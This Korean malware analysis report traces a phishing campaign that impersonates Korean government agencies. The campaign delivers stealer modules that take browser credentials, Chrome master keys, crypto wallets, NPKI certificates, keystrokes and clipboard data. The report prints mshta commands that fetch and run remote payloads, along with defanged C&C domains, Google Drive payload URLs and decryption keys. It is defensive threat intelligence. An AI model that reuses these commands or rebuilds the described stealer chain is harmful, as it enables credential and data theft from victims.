caption - 악성코드 유포 단계 개요도

3.1. 초기 접근 및 악성코드 유포

3.1.1 이메일 & LNK

확인된 피싱 이메일은 국내 공공기관인 여성가족부와 국세청을 사칭하였고, 임박한 인증 기한을 강조해 피해자가 링크를 클릭하도록 유도한다. 두 메일 모두 오픈소스 SMTP 라이브러리인 PHPMailer를 이용해 발송되었다.

caption - 여성가족부 사칭 피싱 이메일

caption - 국세청 사칭 피싱 이메일

이메일 파일 세부 정보는 아래 표와 같다.

| 이메일 제목 | 발신 이메일 주소 | 발신 IP | PHPMailer 버전 |
| --- | --- | --- | --- |
| [여성가족부]+성범죄자+신상정보+고지+알림 | webmaster@nate.nmailhub[.]com | 61.97.243[.]9 | 6.9.1 |
| [국세청]+회원님께+도착한+고지서를+확인하세요. | ebmaster@nate.pklzd[.]com | 103.249.28[.]34 | 6.9.1

caption - 이메일 파일 세부 정보

"확인하러 가기" 버튼을 누르면 파일을 다운받는데, 먼저 C&C 서버에 접속하고 ru 파라미터 값으로 전달된 깃허브 주소로 리다이렉션되어 파일을 다운받는다. 이때 m 파라미터 값으로 피해자 이메일 주소가 전달된다. 이메일 파일에서 확인한 URL은 아래와 같다.

• https://natezlx.myvnc[.]com/docs/?ru=https://github.com/microstrategy743/dev/releases/download/v1.0/sexoffender.zip&m=[base64로 인코딩된 피해자 이메일]

• https://natezlx.myvnc[.]com/docs/?ru=https://github.com/microstrategy743/dev/releases/download/v1.0/tax_bill.zip&m=[base64로 인코딩된 피해자 이메일]

악성코드 유포에 사용된 깃허브 계정 정보는 아래 표와 같다.

| 정보 | 설명 |
| --- | --- |
| microstrategy743 | 깃허브 계정 이름 |
| madeng@svchubsec[.]com | 깃허브 계정에 등록된 이메일

caption - 깃허브 계정 정보

공격자는 로그를 확인할 수 없는 Releases에 악성코드를 업로드하였다. Repogitory에 악성코드를 업로드하면 커밋 로그를 통해 흔적을 확인할 수 있지만 Releases는 흔적을 확인할 수 없다.

caption - microstrategy743 Releases

다운로드한 파일은 압축 파일로, 미끼 문서인 "성범죄자 신상정보 고지.pdf" 파일과 악성코드인 "암호.txt.lnk" 파일이 압축되어 있다. 이때 미끼 문서가 "국세 고지서.pdf" 파일인 압축 파일도 존재한다.

caption - 압축된 파일 목록

과거 버전은 LNK 파일을 PDF로 위장(예: 국제 고지서.pdf.lnk)하였지만 현재는 미끼 문서에 암호를 설정해 "암호.txt.lnk" 파일을 실행하도록 유도한다.

caption - 미끼 문서 실행 시 나타나는 암호 입력 창

"암호.txt.lnk" 파일을 실행하면 실행되는 명령어는 base64로 인코딩되어 있다.

caption - LECmd 분석 결과

명령어를 디코딩하면 mshta를 이용해 페이로드를 실행하는 것을 알 수 있다. 이때 공격자는 한국 URL 단축 서비스를 이용하였다.

• 디코딩 결과: mshta https://link24[.]kr/HSXrWzV

caption - 최종적으로 도달하는 URL

2025년 9월에는 DOC 문서 파일이 공격에 사용되었다. 문서 파일을 실행하면 매크로 허용 버튼을 누르도록 유도하는데, 이때 매크로 허용 시 ShellExecute 매크로에 의해 문서 내부에 포함된 VBScript가 실행된다.

caption - 워드 문서 내용

VBScript는 모든 문자를 ASCII 코드로 변환하고, 10진수와 16진수 연산으로 치환하는 방식의 난독화 기법이 적용되었다. 난독화 해제 스크립트는 "부록 C. Scripts - HTA Deobfuscation"으로 첨부하였다.

caption - 난독화 예시

난독화된 VBScript는 base64로 인코딩된 파워쉘 스크립트를 powershell -e 옵션으로 실행한다. 분석 당시 “buly[.]kr”의 URL 단축 서비스가 중지되어 다운로드가 이루어지지 않았다. 하지만 공격에 사용된 파일들의 제목과 업로드 시기를 고려하면 깃허브 Releases의 "doc.hta" 파일을 다운받는 것으로 보인다. base64로 디코딩 후 실행되는 명령어는 아래와 같다.

• mshta https://buly[.]kr/EooX5dX

DOC 파일의 마지막 저장 날짜는 9월 2일이고, 마지막으로 저장한 사람은 "wang"으로 기록되어 있다. 또한 코드 페이지가 한글을 나타내는 "949"로 기록되어 있다.

caption - DOC 문서 정보

3.1.2 HTA 파일

다운로드한 "pw.hta", "doc.hta", "kyc.hta" 파일 데이터는, 앞선 VBScript 난독화 기법과 동일한 방식으로 난독화되어 있다. 분석 결과 모든 HTA 파일은 상위 미끼 문서는 상이하지만 행위는 모두 동일하다.

"pw.hta" 파일이 실행되면, 구글 드라이브에서 미끼 문서의 암호를 기록한 "password.txt"를 다운로드하고, "%temp%" 경로에 저장해 실행한다. 구글 드라이브 문서 소유자는 naver.accounnt.noreply@gmail[.]com으로, 이번 공격에 사용된 모든 구글 드라이브 문서는 해당 계정의 소유이다.

password.txt 다운로드 URL과 미끼 문서 암호는 아래와 같다.

• URL: https://drive.google[.]com/uc?export=download&id=1kFyBMQdmMvhiu3j9-rTjgV2nVeYGr_fZ

• 암호: "kfgxl;Y859$#KG4fkdl^&"

문서 열람 시 암호를 입력하면 원본 문서를 확인할 수 있고, 공격자는 성범죄자 고지 정보서, 국세 고지서를 포함해 다양한 미끼 문서를 공격에 활용하였다.

| 악성코드 형식 | 미끼 문서 이름 |
| --- | --- |
| LNK | 성범죄자 신상정보 고지.pdf-n국세 고지서.pdf-nKYC_Form.pdf (KYC_Instructions.docx)-ntax_form.pdf (tax_form.docx) |
| DOC | KYC_Form.docx

caption - 악성코드 및 미끼 문서 정보

"password.txt" 파일 실행 이후 "cmd /c sc query WinDefend" 명령어를 실행하는데, 실행 결과에서 "STOPPED" 문자열을 검색해 Windows Defender 서비스의 현재 상태를 확인한다. 이후 서비스 상태에 따라 "v3.log" 또는 "pipe.log" 파일 다운로드 및 AES 복호화 로직으로 분기한다.

"v3.log"는 "v3.hta", "pipe.log"는 "pipe.zip"으로 복호화되며, 각 파일의 세부 정보는 아래 표와 같다.

| 파일 이름 | Windows Defender 상태 | 악성코드 유형 | 다운로드 URL |
| --- | --- | --- | --- |
| v3.log | 중지 | PE | https://drive.google[.]com/uc?export=download&id=12V4yQfKNkeA1W_FIkCpirhSO3dnA52Ni |
| pipe.log | 실행 | Powershell | https://drive.google[.]com/uc?export=download&id=1Mx-A2CPcotb_DDcKmIs9d3DCSjbLwLhM |

caption - 다운로드 파일 세부 정보

복호화에 사용되는 AES Key와 IV는 아래와 같다.

• AES Key: ftrgmjekglgawkxjynqrwxjvjsydxgjc

• AES IV: AES IV: rhmrpyihmziwkvln

3.2. PE 유형

caption - PE 파일 유형 실행 개요도

"v3.hta" 파일은 자기 자신에 포함된 "bPgkTBt0", "TvqQAAMAAA"로 시작하는 문자열을 찾아 각각 base64로 디코딩 후 "%localappdata%\user.txt", "%localappdata%\sys.dll" 파일로 저장한다. 이후 "sys.dll"에서 버전에 따라 다른 이름의 Export 함수를 rundll32로 호출한다.

caption - base64로 인코딩된 데이터

3.2.1. sys.dll

공격자는 주로 Themida, UPX, enigma 등 다양한 사용 패커 및 난독화 도구를 "sys.dll"에 적용해 유포하였지만, 원본 바이너리를 공격에 사용한 이력도 확인되었다. 컴파일 날짜가 8월7일인, 패킹이 적용되지 않은 버전의 "sys.dll" 분석 내용을 다룬다. PE 파일 정보는 아래와 같다.

caption - sys.dll PE 정보

"sys.dll" 실행 이후 안티 VM 로직이 실행되어 아래 조건 중 하나라도 해당하면 자가 삭제 후 프로세스를 종료한다.

• "VBoxMiniRdrDN" 디바이스가 존재할 경우

• 레지스트리 키 "HKLM\SOFTWARE\VMware, Inc.\VMware Tools"가 존재할 경우

• 레지스트리 키 "HKLM\SYSTEM\HardwareConfig\Current\SystemManufacturer"의 값이 "Microsoft Corporation"인 경우

• 레지스트리 키 "HKLM\SYSTEM\HardwareConfig\Current\BIOSVendor"의 값이 "Microsoft Corporation"인 경우

• 레지스트리 키 "HKLM\SYSTEM\HardwareConfig\Current\SystemFamily"의 값이 "Virtual Machine"인 경우

• 레지스트리 키 "HKLM\SYSTEM\HardwareConfig\Current\SystemProductName"의 값이 "Virtual Machine"인 경우

중복 실행 방지를 위해 뮤텍스를 생성한다. 생성하는 뮤텍스 이름은 아래와 같다.

• gjurkn

caption - 뮤텍스 생성 루틴

"%localappdata%\notepad.log" 파일이 존재하지 않으면 user.txt 파일을 RC4 복호화한다. 모든 RC4 복호화 루틴은 암호화된 파일의 선두 16바이트를 키로 사용해 나머지 데이터를 복호화 한다. RC4 복호화 스크립트는 "부록 C. Scripts - RC4 Decryption"으로 첨부하였다.

caption - user.txt 복호화 루틴

복호화된 "user.txt"에는 추가 모듈을 다운받을 3개의 구글 드라이브 URL이 존재한다.

| URL | 파일 이름 |
| --- | --- |
| https://drive.google[.]com/uc?export=download&id=1dWsR1EkV_oxaIrJhXiAmmzvJY8SDgNnu | main64.log |
| https://drive.google[.]com/ucexport=download&id=1uhHhgt4EMMhWZr9b94dxll0aphOg7PYi | net64.log |
| https://drive.google[.]com/uc?export=download&id=1_Z9I0D8M31-q7BKp_hs2TuY-kvlQH9D_ | app64.log |

caption - user.txt URL 정보

이후 "app64.log", "net64.log" 순서로 각 파일을 다운로드한 뒤 각각 chrome.exe, 자기 자신에 인젝션해 실행한다. "main64.log" 파일은 "net64.log"의 실행 결과 파일이 생성된 이후에 다운로드하고, 자기 자신에 인젝션해 실행한다.

3.2.2. app64.log

"app64.log" 파일은 첫 번째로 다운로드되는 파일로, Chrome App-Bound Encryption(ABE)에 사용되는 마스터 키 추출 도구이다. "sys.dll"에 의해 다운 받아지고 RC4로 복호화된 후, Integrity Level이 Low 또는 Untrusted인 chrome.exe 프로세스에 인젝션되어 실행된다.

caption - app64.log 파일 다운로드 및 인젝션 루틴

복호화된 "app64.log"는 DLL파일로, 빌드 시 포함되는 디버그 데이터 중 하나인 PDB 파일 경로가 남아 있다. 확인된 PDB 파일 경로는 아래와 같다.

• E:\Test\AppBound\Bin\reflective_dll.pdb

caption - 복호화된 app64.log 파일 정보

공격자는 깃허브에 공개된 도구를 기반으로 모듈을 제작하였다. 해당 도구는 Chromium 브라우저의 쿠키, 비밀번호, 결제 정보 등의 민감 정보를 추출하는 목적으로 제작되었으며, 보안 소프트웨어의 탐지를 피하기 위해 Reflective DLL Injection 기법을 이용한다. Reflective DLL Injection은 현재 실행중인 프로세스의 메모리에 DLL을 새로 매핑하고 Import Table을 재구축한 뒤 매핑된 DLL을 실행하는 기법이다.

caption - ChromElevator (브라우저 민감 정보 복호화 도구)

인젝션 이후 가장 먼저 실행되는 ReflectiveLoader 함수는 kernel32, ntdll의 베이스 및 필요한 API의 주소를 자체 ROR 해시값과 비교하며 탐색한다. 확보한 API 주소를 이용해 새로 할당한 메모리에 dll을 직접 로드한 후 DllMain 함수를 호출한다.

caption - DLL 베이스 탐색 로직 - 좌) app64.log, 우) ChromElevator

이후 각 브라우저에 해당되는 Local State 파일에서 암호화된 마스터 키를 추출한다. Chromium 계열 브라우저는 각종 민감 정보 암호화에 사용되는 마스터 키를 Local State 파일에 Windows DPAPI 암호화 및 base64로 인코딩해 저장한다. 악성코드는 브라우저 로컬 COM 서버의 복호화 메소드를 이용해 마스터키를 복원한다.

caption - COM 클라이언트 세션 설정 로직 - 상) app64.log, 하) ChromElevator

복원된 마스터 키는 브라우저에 따라 "%temp%\cc_appkey" 또는 "%temp%\ee_appkey" 파일로 저장된다. 공개 도구는 마스터 키를 이용한 민감 정보 복호화까지 진행하지만, 공격자는 마스터키 복원 부분까지만 활용해 모듈을 제작하였다.

3.2.3. net64.log

"net64.log" 파일은 RC4로 복호화되어 메모리에서 실행된다. "net64.log"는 KimJongRAT의 인포스틸러 코드를 변형해 제작되었으며, 시스템에서 각종 민감 데이터를 수집하는 기능을 한다.

caption - net64.log 다운로드 및 실행 루틴

복호화된 "net64.log"은 DLL 파일이고, UPX로 패킹되어 있다.

caption - 복호화된 net64.log 파일 정보

API 호출 방식은 난독화된 API 이름을 복원한 뒤, GetProcAddress 리턴 값을 전역 변수에 저장한다. 이후 악성코드는 전역 변수에 저장한 주소를 호출한다.

caption - API 이름 난독화 해제 및 로드 루틴

API 이름 난독화는 단일 치환 암호 방식으로 구현되었으며, 모든 문자열이 동일한 치환 테이블을 공유한다. 문자열 치환에 사용한 스크립트는 "부록 C. Scripts - String Deobfucation"으로 첨부하였다.

시스템 정보 수집

시스템 정보 수집 시에는 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"의 CurrentVersion값으로 윈도우 버전을 조회하여 버전에 대응하는 적절한 레지스트리에 접근한다. 이때 "[system]"을 식별자로 사용하며, 각 버전에 따라 접근하는 레지스트리 경로는 아래 표와 같다.

| 레지스트리 값 | Windows 8.1 이상 | Windows 8.1 이전 |
| --- | --- | --- |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentMajorVersionNumber | O | X |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentMinorVersionNumber | O | X |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuildNumber | O | O |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UBR | O | X |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName | O | O |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion | X | O

caption - 시스템 정보 수집 시 접근하는 레지스트리 경로

추가로 GetVersionExA, GetSystemInfo, GetSystemMetrics API와 "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions\ProductType" 레지스트리 값을 이용해 Windows 버전을 확인한다. 이후 GetCPUInfo 함수에서 cpuid 명령어로 CPU 이름까지 수집하면 시스템 정보 수집이 완료된다.

caption - 시스템 정보 수집 루틴

프로세스 정보 수집

전체 프로세스 목록을 조회한 뒤, system 계정 소유의 프로세스를 제외한 전체 프로세스 목록 및 소유 사용자 정보를 수집한다. 이때 "[process]"를 식별자로 사용한다.

caption - 프로세스 정보 수집 루틴

설치된 소프트웨어 정보 수집

공용 및 사용자 시작 메뉴의 %Programs% 디렉토리를 탐색하며 하위 디렉토리 이름과 lnk 확장자인 파일 이름을 저장한다. 이때 Accessories, Games, Administrative Tools, Startup 디렉토리는 제외되며, "[programs]"를 식별자로 사용한다.

caption - 설치된 소프트웨어 정보 수집 루틴

메일 계정 정보 수집

메일 종류별로 알맞은 레지스트리 값을 조회해 계정 및 프로필 정보를 수집하며, FTP 클라이언트인 FileZila 데이터까지 수집한다. "[mails]"를 식별자로 사용하며, 계정 및 프로필 정보 수집 대상은 아래와 같다.

• Outlook

• IncrediMail

• Thunderbird

• GroupMail

• FileZilla

caption - 메일 계정 정보 수집 루틴

브라우저 정보 수집

브라우저 종류별로 민감 정보 파일을 수집해 각 웹 서비스 별로 저장된 로그인 정보를 복호화 및 저장한다. 이후 하드코딩된 sql 쿼리를 이용해 수집한 파일에서 로그인 정보를 추출한다. 로그인 정보 복호화 시 새로 추가된 “app64.log”가 추출한 마스터키가 아닌 “net64.log” 내부에서 CryptUnprotectData API를 이용해 복원한 마스터키를 사용한다. 이때 "[web]"을 식별자로 사용하며, 저장하는 로그인 데이터는 아래와 같다.

• 로그인 URL

• ID

• 복호화된 Password

• 브라우저 종류

• 로그인 정보 저장 시기

caption - 브라우저 정보 수집 루틴

브라우저 별 쿠키 정보도 함께 수집된다. Chrome, Edge, Whale, Firefox의 쿠키 데이터를 추출해 전체 개수와 함께 저장한다. 쿠키 정보 추출 시에도 하드코딩된 sql 쿼리를 이용하며, "[Cookies]"를 식별자로 사용한다.

추가 파일 수집 및 압축

"nsv" 문자열을 접두사로 임시 디렉토리를 생성해 아래 데이터를 모두 넣고 micro.log.zip으로 압축한다.

• micro.log (net64.log가 이 시점까지 수집한 모든 정보)

• Chromium 기반 브라우저의 민감 정보 파일 원본

• Exodus/Telegram/Discord 민감 정보 파일 원본

• GPKI & NPKI 파일

• ext.log (모든 브라우저의 확장 프로그램 ID 목록)

caption - 추가 파일 수집 루틴

3.2.4. main64.log

"sys.dll"은 "net64.log"에 의해 "micro.log.zip" 파일이 생성될 때까지 "Sleep(1000)"을 반복하며 대기한다. "micro.log.zip" 파일이 생성되면 구글 드라이브에서 "main64.log" 파일을 다운로드한 뒤 RC4로 복호화해 메모리에서 실행한다.

caption - main64.log 다운로드 및 실행 루틴

"main64.log"는 패킹되지 않았고, "sys.dll" 파일과 컴파일 메타데이터가 동일하다. 이는 두 파일이 동일한 개발 환경에서 빌드된 것으로 보인다.

caption - 복호화된 main64.log PE 정보

메모리에서 실행될 때 우선 기본 설정 및 지속성 확보를 한다. GetVolumeInformationA 함수로 볼륨 시리얼 번호를 조회해 피해자 식별자로 사용한다. 이때 조회에 실패하면 "[컴퓨터 이름]_[유저 이름] " 형식의 문자열을 base64로 인코딩해 식별자로 사용한다. 통신하는 C&C 서버 주소는 아래와 같다.

• kzloly.nmailhub[.]com

이후 자동 실행 레지스트리를 등록해 재부팅 이후에도 "sys.dll" 파일이 실행되도록 한다.

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NetService: "rundll32 %localappdata%\sys.dll,s"

caption - 자동 실행 레지스트리 등록 루틴

"main64.log"는 4개의 스레드를 생성해 아래 행위를 수행한다.

1. 추가 정보 수집 및 C&C 서버 통신

2. 클립보드 데이터 수집

3. 키로깅

4. 3에서 수집된 로그를 netkey 파일에 추가

C&C 서버 통신

C&C 서버 통신 스레드는 10분 주기로 수집 데이터 업로드, 파일 업로드 및 다운로드, 원격 명령 실행, 악성코드 업데이트를 수행한다.

파일 업로드 시 0xFE로 전체 파일을 XOR해 "%temp%\[파일 이름]_" 형태로 저장하고 C&C 서버로 전송한다. 이때 앞서 설정한 피해자 식별자를 id 값으로, 전송할 파일을 file0 바이너리 파일로 포함시켜 C&C 서버의 루트 디렉토리로 Multipart POST 요청을 보낸다. 예외적으로 "netkey”"파일은 전송할 파일을 val 데이터로 포함해 일반 POST 요청을 전송한다.

caption - XOR 암호화 루틴

업로드된 파일은 C&C 서버에 "/[피해자 식별자]/[파일 이름]"으로 저장되어 해당 경로에 대한 직접적인 요청 및 응답 확인으로 업로드 성공 여부를 확인한다. 업로드되는 파일과 정보는 아래 표와 같다.

| 파일 이름 | 정보 |
| --- | --- |
| micro.log.zip | net64.log가 수집한 모든 정보 |
| history.log | main64.log가 수집한 시스템, 운영체제, 컴퓨터 정보 |
| netlist.log | main64.log가 수집한 확장 프로그램 및 파일 시스템 정보 |
| netkey | 키로그 및 클립보드 데이터

caption - 업로드 파일 정보

"history.log" 파일은 "main64.log" 모듈이 아래 시스템 정보를 수집해 생성한다.

• IP

• 컴퓨터 이름

• 사용자 이름

• 드라이브 정보

• 운영체제 정보

• 설치된 소프트웨어 목록

• CPU 정보

"netlist.log" 파일에는 하드코딩된 cmd 명령어로 수집된 확장 프로그램 ID 목록과 파일 시스템 정보가 저장된다. 명령어는 드라이브를 순회하며 특정 확장자 또는 키워드를 가지는 파일 목록을 작성하고, C 드라이브인 경우extensions 경로의 모든 하위 디렉토리 목록까지 추출한다.

리스팅 대상이 되는 확장자와 키워드는 아래와 같다.

• 확장자 - hwp, pdf, doc, docx, xls, xlsx, zip, rar, egg, txt, jpg, png, jpeg, alz, ldb, log

• 키워드 - wallet, UTC--*

C&C 서버와 통신 시에는 특정 엔드포인트마다 요청을 보내고 응답에 따라 여러 동작을 수행한다. "[C&C 도메인]/[피해자 ID]/[엔드포인트]"로 요청이 이루어지고, 모든 응답 데이터는 앞 16바이트를 키로 사용해 RC4 복호화한다. 데이터 수신이 정상적으로 이루어지면 delete 문자열을 전송하는데, 이는 전송된 데이터를 C&C 서버에서 삭제하는 과정으로 추정된다. 요청을 보내는 엔드포인트 정보는 아래 표와 같다.

| 엔드포인트 | 응답 | 특징 |
| --- | --- | --- |
| out | 피해자 PC에서 C&C 서버로 업로드할 파일 경로 |  |
| in | 피해자 PC에 저장할 파일 데이터와 해당 파일이 저장될 로컬 경로 |  "ABCDEFGHIJKLMNOP"를 저장 경로와 데이터 사이의 구분자로 사용 |
| cmd | 피해자 PC에서 실행될 명령어 | 새로운 cmd 프로세스에 인자로 전달 |
| cok | net 파일 업데이트 데이터 URL |  |
| dir | 디렉토리 리스팅 타겟 경로 | 결과를 "%localappdata%\list.log"에 저장해 C&C 서버로 전송 |
| tmp64 | notpad.log (main64.log) 파일 업데이트 데이터 URL

caption - 엔드포인트 정보

클립보드 데이터 수집

클립보드 데이터 수집 스레드는 0.05초마다 반복하며 현재 클립보드의 가장 최신 데이터를 수집한다. 확보한 데이터의 자체 ROR 해시값이 이전 데이터의 해시값과 다르면 "%localappdata%\netkey" 파일에 이어 붙인다. 이때 "netkey" 파일의 수정 시간이 바뀌기 때문에, "netkey" 파일의 생성, 접근, 수정 시간을 rundll32의 시간으로 변경한다.

해시 계산 알고리즘은 다음과 같다.

1. 기본값을 0으로 설정

2. 현재 해시값에 1을 더해 32bit ROR 13

3. 현재 문자의 ASCII 값 더하기

4. 문자열 처음부터 끝까지 2~3 반복

caption - 클립보드 데이터 해시 계산 루틴

키로깅

키로깅 스레드는 0.001초마다 반복하며 입력되는 키는 물론, 띄워진 창 제목이 이전과 다르면 창 제목까지 전역 변수에 저장한다.

caption - 키로깅 루틴

키로그 “netkey” 파일에 추가

10초마다 키로그가 저장된 전역 변수 버퍼를 "%localappdata%\netkey" 파일에 이어 붙인다. 데이터 추가 이후 전역 변수를 초기화하고, "netkey" 파일의 생성, 접근, 수정 시간을 rundll32의 시간으로 변경한다.

caption - 키로그 저장 루틴

3.3. 파워쉘 스크립트 유형

caption - 파워쉘 스크립트 유형 실행 개요도

Windows Defender가 실행 중이면 "pipe.zip" 파일을 다운 받아 최종적으로 파워쉘 스크립트로 제작된 악성코드가 실행된다. "pipe.zip"에는 "1.log", "1.ps1", "1.vbs", "2.log" 총 4개의 파일이 압축되어 있다. 이 중 "1.ps1" 파일에 "-FileName 1.log" 인자를 주어 실행한다.

caption - pipe.zip에 압축된 파일 목록

3.3.1. 1.ps1

"1.ps1"은 FileName 인자로 전달된 파일을 base64로 디코딩해 실행하는 디코더 스크립트이다.

caption - 디코딩 및 실행 루틴

3.3.2. 1.log

"1.log" 파일은 메인 악성코드로, 실행 직후 컴퓨터 UUID를 id로 사용해 "%Temp%" 경로에 디렉토리를 생성하고 각종 경로와 C&C 서버 주소를 설정한다. 이후 "%Temp%" 경로에 "pid.txt" 파일을 생성해 중복 실행을 방지한다. 하드코딩된 C&C 서버 주소는 아래와 같다.

• quemr.mailhubsec[.]com

caption - 초기 설정 루틴

안티 VM

컴퓨터 제조사 이름에 VMware, Microsoft, VirtualBox가 포함되면 KillMe 함수를 호출해 압축 해제된 모든 파일을 삭제한 뒤 프로세스를 종료한다.

caption - 안티 VM 루틴

지속성 확보

RegisterTask 함수는 “1.vbs” 파일을 “HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\WindowsSecurityCheck” 레지스트리 값으로 등록해 지속성을 확보한다. “1.vbs”는 현재 작업중인 디렉토리를 "%localappdata%\pipe"로 변경하고 “1.ps1” 스크립트에 “-FileName 1.log” 인자를 주어 실행한다.

caption - 지속성 확보 루틴

시스템 정보 수집

Init 함수는 각종 시스템 정보를 수집해 "%Temp%\[UUID]\info.txt" 파일에 저장한다. 이 과정에서 디스크 이름에 Virtual Disk, Virtual HD, VMware, Google PersistentDisk 가 포함되면 KillMe 함수를 호출해 파일 삭제 및 프로세스 종료를 수행한다. 수집하는 정보는 아래와 같다.

• NPKI, GPKI 디렉토리

• Admin 여부 및 UAC 설정

• OS, CPU 정보

• 디스크, 볼륨 정보

• 프로세스 목록

• 설치된 소프트웨어 목록

최근 파일 목록 수집

RecentFiles 함수는 "%AppData%\Microsoft\Windows\Recent" 경로의 바로가기 파일들에 연결된 파일 경로를 모두 추출해 "%Temp%\[UUID]\recent.txt"에 저장한다.

caption - 최근 파일 목록 수집 함수

민감 정보 수집

GetBrowserData 함수는 확장 프로그램, 사용자 프로필, 방문 기록 등 브라우저 종류에 대응되는 각종 민감 정보와 이를 복호화할 수 있는 마스터 키를 수집한다. 수집 대상 브라우저는 Edge, Chrome, Whale, Firefox 이며, 모든 브라우저의 확장 프로그램 목록은 "%Temp%\[UUID]\extensions.txt" 파일에 일괄 기록된다.

1. Edge, Chrome, Whale

"%localappdata%\[브라우저 별 경로]\User Data"에 저장된 정보를 수집해 "%Temp%\[UUID]\" 디렉토리에 저장한다. 데이터 저장 시 파일 이름에서 추출한 브라우저 이름을 접두사로 추가해 출처를 나타낸다. 수집하는 데이터는 아래와 같다.

• Local State에서 추출 및 복호화된 masterkey

• 프로필 별 Login Data, Bookmark, Extensions, 암호화폐 지갑 정보

caption - Edge 민감 데이터 수집 루틴

암호화폐 지갑 정보 추출 시 "{ 확장 ID : 지갑 식별자 }" 형식의 해시 테이블을 생성하고, 키와 디렉토리 이름이 동일하면 해당 디렉토리 하위의 ldb, log 파일을 "%Temp%\[UUID]\[브라우저]_[프로필]_[지갑 식별자]_[파일 이름]"으로 복사한다. 추출 대상이 되는 암호화폐 지갑과 확장 ID는 "부록 B. IOCs - Extension ID"로 첨부하였다.

caption - 암호화폐 지갑 정보 추출 루틴

2. Firefox

"%AppData%\Mozilla\Firefox\Profiles"에 저장된 정보를 수집해 "%Temp%\[UUID]\" 디렉토리에 저장한다. 저장 시 Firefox 접두사가 사용된다. 프로필 별로 수집하는 데이터는 아래와 같다.

• key4.db

• key3.db

• cookies.sqlite

• logins.json

caption - Firefox 민감 데이터 수집 루틴

GetTelg 함수는 "%AppData%\Telegram Desktop\tdata"에 저장된 텔레그램 데이터를 "%Temp%\[UUID}\telg\" 디렉토리에 복사한다. 이때 계정 인증 정보인 "D877F783D5D3EF8C" 디렉토리 내부 파일과, tdata 디렉토리 최상위 경로의 파일들이 대상이 된다.

caption - 텔레그램 데이터 수집 함수

Send 함수는 "%Temp%\[UUID]\" 디렉토리를 "%localappdata%\init.zip"으로 압축한다. 이후 압축 파일의 이름을 "init.dat"으로 변경해 서버로 전송한다. 이때 인자 id로 UUID가 함께 전송되어 식별자 역할을 한다.

전송에 성공하면 "%Temp%\[UUID]\" 디렉토리 내부의 모든 디렉토리와 파일, "%localappdata%\init.dat" 파일을 모두 삭제한다. 다음 동작인 CreateFileList 함수에서 파일 목록을 수집하는데 시간이 꽤 소요되므로 공격자는 최소한 GetTelg 함수에서 수집한 데이터까지는 성공적으로 전송되도록 설계하였다.

caption - 수집된 정보 압축 및 전송 함수

파일 전송 시에는 전송할 파일을 0xFE 로 XOR 하여 전송한다. 파일 크기가 크면 4MB 크기의 청크로 나누어 여러 번에 걸쳐 전송한다.

caption - 전송 데이터 가공 루틴

CreateFileList 함수는 모든 드라이브 (C 드라이브의 경우 Users 디렉토리) 하위 경로의 특정 확장자 또는 이름을 가진 파일 경로를 수집해 "%Temp%\[UUID}\FileList.txt" 파일에 기록한다. 해당 파일은 "lst.zip"으로 압축한 뒤에 "lst.dat"로 이름을 변경하고 서버에 전송한다.

• 확장자: txt, doc, csv, doc, docx, xls, xlsx, pdf, hwp, hwpx, jpg, jpeg, png, rar, zip, alz, eml, ldb, log

• 키워드: wallet, UTC-- , blockchain, keystore, privatekey, metamask, phrase, ledger, password, myether, dcent

caption - 파일 경로 수집 함수

3.3.3. 2.log

"2.log" 파일은 "1.ps1"에 의해 실행되고, 키로그 및 클립보드 데이터 수집 모듈이다. 한 번 실행되면 무한 반복되며, 60초 간격으로 수집된 데이터가 "%Temp%\[UUID]\k.log" 파일에 기록된다.

caption - 키로그 및 클립보드 데이터 수집 루틴

모든 동작이 마무리되면 마지막으로 Work 함수가 실행된다. Work 함수는 10 분 간격으로 반복하며 다음 동작을 차례대로 수행한다.

1. 수집한 키로그 및 클립보드 데이터 전송

2. GetAppKey 함수로 Chrome Appbound Key 다운로드 또는 수집

3. C&C 서버에서 파일 경로가 저장된 파일(rd)을 다운로드한 뒤, 해당되는 파일을 C&C 서버로 업로드

4. C&C 서버에서 파일 이름이 저장된 파일(wr)을 다운로드한 뒤, 해당되는 파일을 C&C 서버에서 다운로드

5. C&C 서버에서 명령어가 저장된 파일(cmd)을 다운로드한 뒤 실행

결과적으로 공격자가 rd, wr, cmd 파일을 C&C 서버에 업로드하면 악성코드 Work 함수가 C&C 서버와 상호작용하며 파일 업로드 및 다운로드, 원격 명령 실행이 가능하다.

Work 함수에서 실행되는 GetAppKey 함수는 Chrome 마스터 키를 복호화 및 전송하는 모듈을 다운로드 실행한다.

caption - Appbound key 추출 및 전송 루틴

PE 파일 유형 공격의 "app64.log"와 동일한 마스터 키 추출 DLL 을 구글 드라이브에서 "nzvwan.log"로 다운받고, 로더 DLL인 "appload.log" 파일도 다운로드해 base64로 디코딩 후 rundll32.exe 로 실행한다. 로더 DLL 은 PE 유형 공격의 sys.dll 과 동일하게 낮은 권한의 chrome 프로세스에 마스터 키 추출용 DLL 을 인젝션해 실행한다.

caption - appload.log 인젝션 루틴